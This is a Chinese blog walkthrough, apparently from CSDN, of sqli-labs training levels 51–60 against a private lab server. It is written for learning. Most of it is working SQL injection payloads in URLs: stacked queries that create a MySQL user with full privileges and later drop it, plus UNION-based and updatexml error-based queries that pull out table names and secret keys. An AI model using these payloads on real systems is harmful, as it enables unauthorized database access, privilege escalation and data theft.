sqli-labs通关(less51~less60)

最新推荐文章于 2024-05-02 22:32:03 发布
最新推荐文章于 2024-05-02 22:32:03 发布
阅读量1.6k 收藏 6
点赞数 3
分类专栏: sqlilabs # 注入 文章标签: sql注入 mysql 网络安全 navicat 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/120337529
版权

目录

Less51

Less52

Less53

Less54

Less55

Less56

Less57

Less58

Less59

Less60

Less51

浏览器地址栏输入如下url,返回sql语法错误,从报错可知闭合是单引号

http://192.168.101.16/sqli-labs-master/Less-51/?sort=1'

这关就堆叠注入而言,除了闭合,其他应该和上一关没多大区别。

这关再来点新花样,用堆叠注入创建一个新用户。创建新用户之前,先在服务器上确认一下,现在只有下图这三个用户。

 然后在浏览器地址栏输入如下payload

http://192.168.101.16/sqli-labs-master/Less-51/?sort=1';CREATE USER 'xiannv'@'localhost';GRANT ALL PRIVILEGES ON *.* TO 'xiannv'@'localhost';-- s

然后再到服务器上确认一下,发现新用户xiannv已经创建了,并且拥有除Grant Option之外的所有权限

这关源代码也不分析了,和Less50相比只是多了单引号闭合。

Less52

浏览器地址栏输入如下url,返回正确查询结果

http://192.168.101.16/sqli-labs-master/Less-52/?sort=1

浏览器地址栏输入如下url,不返回查询结果。

http://192.168.101.16/sqli-labs-master/Less-52/?sort=1'
http://192.168.101.16/sqli-labs-master/Less-52/?sort=1"

由此可知,本关没有闭合,是数字型。

上一关中用堆叠注入创建的数据库用户xiannv没有grant option权限,这关就用堆叠注入把这个权限授予她吧

浏览器地址栏输入payload:

http://192.168.101.16/sqli-labs-master/Less-52/?sort=1;GRANT grant option ON *.* TO 'xiannv'@'localhost'

再到服务器上瞅瞅,发现xiannv@localhost已经有grant option的权限了

在网上看到一篇说mysql用户权限管理的好文章,mark一下:Mysql 用户权限管理 - keme - 博客园 (cnblogs.com) 

Less53

浏览器地址栏输入下面两个url有正确的sql查询结果

http://192.168.101.16/sqli-labs-master/Less-53/?sort=1
http://192.168.101.16/sqli-labs-master/Less-53/?sort=1"

输入下面的url不返回查询结果,可以判断闭合包含单引号

http://192.168.101.16/sqli-labs-master/Less-53/?sort=1'

输入下面的url,有正确的sql查询结果,可以判断闭合是单引号

http://192.168.101.16/sqli-labs-master/Less-53/?sort=1'-- s

接下来用堆叠注入把Less51创建的数据库用户xiannv删掉吧

浏览器地址栏输入如下payload:

http://192.168.101.16/sqli-labs-master/Less-53/?sort=1';DROP USER 'xiannv'@'localhost';-- s

再到服务器上一看,用户'xiannv'@'localhost'果然没有了

Less54

从这关开始就全是challenge了,就是要在规定步数之类完成特定任务。

比如本关要在10步之内找到CHALLENGES数据库中的secret key并提交

第1步:看看正常情况。浏览器地址栏输入:

​​​​​​http://192.168.101.16/sqli-labs-master/Less-54/?id=1

回显正确的查询结果。

 第2步:看看闭合含不含单引号。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-54/?id=1'

不回显查询结果,说明闭合包含单引号,或者没有闭合(数字型)。

 第3步:确认闭合符号。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-54/?id=1'-- s

回显正确的查询结果,说明闭合是单引号。

第4步:猜列数。其实根据之前的关卡已经可以知道这边查询结果是3列了,不过既然这关给的步数限制比较多,那就稍微正经一点,挥霍一下吧。

浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-54/?id=1' order by 3-- s

回显正确的查询结果。

第5步:继续猜列数。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-54/?id=1' order by 4-- s

不回显查询结果,结合上一步,可知查询结果有3列。

第6步:union注入爆表名和列名。

由于题目已经说明了数据库名是CHALLENGES了,所以这里就不用爆库名了。为了节省步数(其实这一关好像还没啥必要),我决定表名和列名在同一个语句中一起爆。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-54/?id=-1' union select 1,2,group_concat(concat(table_name,'~',column_name)) from information_schema.columns where table_schema='challenges'-- s

回显的查询结果爆出了表名:m1pzj77a67,列名:id,sessid,secret_TQQ8和tryy

第7步:拿secret key。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-54/?id=-1' union select 1,2,secret_TQQ8 from CHALLENGES.m1pzj77a67-- s

回显的查询结果包含secret key:X4nsyosN33eZXTou83SDCjSU

将其填到提交secret key的提交框并submit即可过关。

Less55

这关的要求是在14步之内找到CHALLENGES数据库中的secret key并提交,限制步数比上一关多,看来可能比上一关难点。

第1步:看看正常情况。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-55/?id=1

回显正确的查询结果。

第2步:看看闭合含不含单引号。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-55/?id=1'

不回显查询结果,说明闭合可能包含单引号,或者没有闭合(数字型)。

第3步:看看闭合是否包含双引号。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-55/?id=1"

不回显查询结果,说明闭合可能包含双引号,或者没有闭合(数字型)。

第4步:结合上面两步的结果,是数字型的概率很大。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-55/?id=1-- s

不回显查询结果,说明还是需要闭合的。

第5步:先不着急乱猜,根据步骤2~3分析一下,如果需要闭合单引号或者双引号,应该url结尾加双引号或者单引号至少有一个能得到正确的查询结果才对,但现在两种情况都不返回查询结果,说明闭合不包含引号。那试试括号是不是闭合符吧,浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-55/?id=1)-- s

返回正确的查询结果了,本关闭合符号是括号。

第6步:猜列数。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-55/?id=1) order by 3-- s

返回正确查询结果

第7步:继续猜列数。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-55/?id=1) order by 4-- s

不返回查询结果,结合上一步可知,查询结果有3列。

第8步:union注入同时爆表名和列名。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-55/?id=-1) union select 1,2,group_concat(concat(table_name,'~',column_name)) from information_schema.columns where table_schema='challenges'-- s

得到表名:pmr9brqkfr,列名:id,sessid,secret_WXJO,tryy

第9步:得到secret key。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-55/?id=-1) union select 1,2,secret_WXJO from challenges.pmr9brqkfr-- s

得到secret key:C400uBggDWqhqL6JsKzwkQNC

Less56

本关要求依旧是在14步之内找到CHALLENGES数据库中的secret key并提交。

第1步:看看正常查询结果。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-56/?id=1

回显正确的查询结果。

第2步:看看闭合是否包含单引号。 浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-56/?id=1'

不返回查询结果,说明闭合可能包含单引号,也可能没有闭合(数字型)

第3步: 看看闭合是否包含双引号。 浏览器地址栏输入:

​​​​​​http://192.168.101.16/sqli-labs-master/Less-56/?id=1"

返回了正确的查询结果,说明闭合不包含双引号。并且结合上一步可以确认,闭合包含单引号。

第4步:看看闭合是否是单引号。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-56/?id=1'-- s

不返回查询结果,说明闭合除了单引号,还包含其他符号。

第5步:看看闭合是否是')。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-56/?id=1')-- s

返回了正确的查询结果,说明闭合是')

第6步:猜列数。 浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-56/?id=1') order by  3-- s

返回了正确的查询结果,说明列数大于等于3

第7步:继续猜列数。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-56/?id=1') order by  4-- s

不返回查询结果,结合上一步,说明查询结果有3列。

第8步:union注入同时爆表名和列名。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-56/?id=-1') union select 1,2,group_concat(concat(table_name,'~',column_name)) from information_schema.columns where table_schema='challenges'-- s

得到表名:ey1ib6h4jw,列名:id,sessid,secret_UMWT,tryy

第9步:得到secret key。 浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-56/?id=-1') union select 1,2,secret_UMWT from challenges.ey1ib6h4jw-- s

得到secret key:UAeT2GPChCGCMdvzkhBtY3mK

Less57

本关要求依旧是在14步之内找到CHALLENGES数据库中的secret key并提交。

步骤1:看看正常情况。浏览器地址栏输入:

​​​​​​http://192.168.101.16/sqli-labs-master/Less-57/?id=1

返回正确查询结果。

步骤2:看看闭合是否包含单引号。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-57/?id=1'

返回正确查询结果,说明闭合不包含单引号。

步骤3:看看闭合是否包含双引号。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-57/?id=1"

不返回查询结果,说明闭合包含双引号。

步骤4:确认闭合是否是双引号。 浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-57/?id=1"-- s

返回正确查询结果,说明闭合就是双引号。

步骤5:猜列数。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-57/?id=1" order by 3-- s

返回正确查询结果,说明列数大于等于3

步骤6:继续猜列数。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-57/?id=1" order by 4-- s

不返回查询结果,说明查询结果有3列。

步骤7:union注入同时爆表名和列名。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-57/?id=-1" union select 1,2,group_concat(concat(table_name,'~',column_name)) from information_schema.columns where table_schema='challenges'-- s

得到表名:ab50y8469w,列名:id,sessid,secret_OOXZ,tryy

步骤8:得到secret key。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-57/?id=-1" union select 1,2,secret_OOXZ from challenges.ab50y8469w-- s

得到secret key:7zMYlzIFli6W7XvNm4v3TUBq

Less58

本关要求在5步之内找到CHALLENGES数据库中的secret key并提交。

步骤1:看看正常情况。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-58/?id=1

有红框所示的返回结果(这里的结果不是数据库查询结果,是服务端代码玩的一个小花样,所以本关就算没有步数限制也不能用union注入)。

步骤2:看看闭合是否包含单引号。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-58/?id=1'

发现有报错,报错表名本关的闭合就是单引号。考虑到报错注入比union注入所需步骤少,所以本关用报错注入。

步骤3:用报错注入获取表名。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-58/?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,31),0x7e),1)-- s

得到表名:6y21vkvbfl

步骤4:得到列名。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-58/?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='6y21vkvbfl'),1,31),0x7e),1)-- s

得到列名:id,sessid,secret_33BN,tryy

(忘记截图了,重来的话,表名和列名都要变了,假装这边有个图吧……)

步骤5:得到secret key。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-58/?id=1' and updatexml(1,concat(0x7e,substr((select secret_33BN from challenges.6y21vkvbfl),1,31),0x7e),1)-- s

得到secret key:h9SJet6HycYVr3dG0418HiKT

Less59

本关要求也是在5步之内找到CHALLENGES数据库中的secret key并提交。

步骤1:先看看正常情况。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-59/?id=1

有红框所示的返回结果

步骤2:看看闭合是否包含单引号。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-59/?id=1'

得到报错信息,通过报错信息可知,本关是数字型,无闭合符号。

步骤3:用报错注入获取表名。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-59/?id=1 and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,31),0x7e),1)-- s

得到表名:kd33qrjwiw

步骤4:用报错注入获取列名。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-59/?id=1 and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='kd33qrjwiw'),1,31),0x7e),1)-- s

得到列名:id,sessid,secret_ZCP4,tryy

步骤5:用报错注入获取secret key。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-59/?id=1 and updatexml(1,concat(0x7e,substr((select secret_ZCP4 from challenges.kd33qrjwiw),1,31),0x7e),1)-- s

得到secret key:YQmYxQmYvwIqIWyCJSEma819

Less60

本关要求也是在5步之内找到CHALLENGES数据库中的secret key并提交。

步骤1:先看看正常情况。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-60/?id=1

有红框所示的返回结果

步骤2:看看闭合是否包含双引号。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-60/?id=1"

返回报错信息,通过报错信息可知,本关闭合符号是")

步骤3: 用报错注入获取表名。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-60/?id=1") and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,31),0x7e),1)-- s

得到表名:pilov0q6gw

步骤4:用报错注入获取列名。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-60/?id=1") and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='pilov0q6gw'),1,31),0x7e),1)-- s

得到列名:id,sessid,secret_SKRP,tryy

步骤5:用报错注入获取secret key。浏览器地址栏输入:

http://192.168.101.16/sqli-labs-master/Less-60/?id=1") and updatexml(1,concat(0x7e,substr((select secret_SKRP from challenges.pilov0q6gw),1,31),0x7e),1)-- s

得到secret key:Q75wD9fVwvK1mql1UjQhLwSj

仙女象
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
linux之间实现文件传输
嵌入式
05-08 5880
测试环境说明 1、一台ubuntu主机,用户名为skfall,ip为192.168.101.16。 2、一台mint主机,用户名为mint,ip为192.168.101.26。 3、两个主机使用ping可以相互ping通。 4、使用ubuntu作为远程主机,mint作为本地主机 本地主机下远程登录到远程主机 ssh -l skyfall 192.168.101.16 ssh -l mint 19...
sqli-labs(51-65)
猎荒者
02-05 322
人过留名,雁过留声 人生天地间,凡有大动静处 必有猪头 前言 Less 51 - Less 53 还是 Stacked-injection (堆叠注入),Less 54 - Less 65 是 Challenge 关卡,考察的知识点比较综合,算是对前面部分知识点的一个小总结吧,温故而知新。 Less 51 ① 源码分析 ② 漏洞利用 ...
sql-labs通关详解(1-10)
guowu666的博客
05-02 626
sqli-labs 1-10通关详解。
SQL注入学习part06:(结合sqli-libs学习:51-61关)
Q_U_A_R_T_E_R的博客
08-06 192
写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) SQL注入学习part06
pikachu CSRF(跨站请求伪造) (皮卡丘漏洞平台通关系列)
箭雨镜屋
04-14 7893
一、官方介绍 本节引用内容来自pikachu漏洞平台(删了一些内容,留下了最重要的部分,并为精炼语言进行了一些修改) 1、我们判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。 2、本质是借用户的权限完成攻击,因此攻击成功需要用户已经通过验证获得了权限,并触发了攻击者提供的请求。 3、网站如果要防止CSRF攻击,则需要对敏感信息的操作实施对应的安全措施,防止这些操作出现被伪造的情况,从而导致CSRF。比如: --对敏感信息的操作增加安全
sql-labs通关
whisper921的博客
03-05 1万+
less 1—单引号字符型注入 字符型注入,单引号 通过随机输入id得知用户名和密码,网址后面接?id=1 判断 Sql 注入漏洞的类型:1.数字型 2.字符型 用 and 1=1 和 and 1=2 来判断: 1.Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。 2.Url 地址中继续输入 http://xxx/abc.php?id= x and 1=2 ,页面运行错误,则说明此 Sql 注入为数字型注入。 .
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-lab通关txt
07-22
sqli-lab1~10的通关txt,其中包含了注入代码以及相关注解 代码由于存储在txt中,无法直接复制使用,请手打。 (可能是由于编码问题)
sqlilabs通关()
Forrest_bear的博客
05-24 1037
就像以下代码一样:隔离空格。
史上最详细的sql-labs通关秘籍less1-4
weixin_50644728的博客
11-24 770
到此就完整地过了一遍less1了,总结来说有以下几个步骤:先判断注入类型:是数值型还是字符型,通过测试可知less1为字符型注入(引号包裹id值),闭合单引号判断字段数:用order by测试回显字段:用union select 1,2,3,……获取数据库名:用database()函数获取数据表名:用group_concat(table_name)、information_schema.tables表中的security数据库
shell脚本统计IP归属地址
weixin_33885253的博客
08-29 360
shell脚本统计IP归属地址 [root@localhost ~]# cat testipguishu.sh #/bin/bash #cd /data/iplog/$1/pv #txt=$(ls -l|awk '{print $NF}'|sed '1d') #for n in $txt #do #awk '{print $3}' $n |sort|uniq >/tmp/txt.${n} ...
sqli-labs通关详解
m0_52051132的博客
10-15 6873
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sqli-labs 1-10(GET型注入)新手通关详解(高手误入)
b1n的博客
07-16 2928
1.第一关是单引号字符型注入2.用--+进行注释,页面正常显示。
Sqli-labs全通关教程(手工注入+工具使用sqlmap)
热门推荐
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值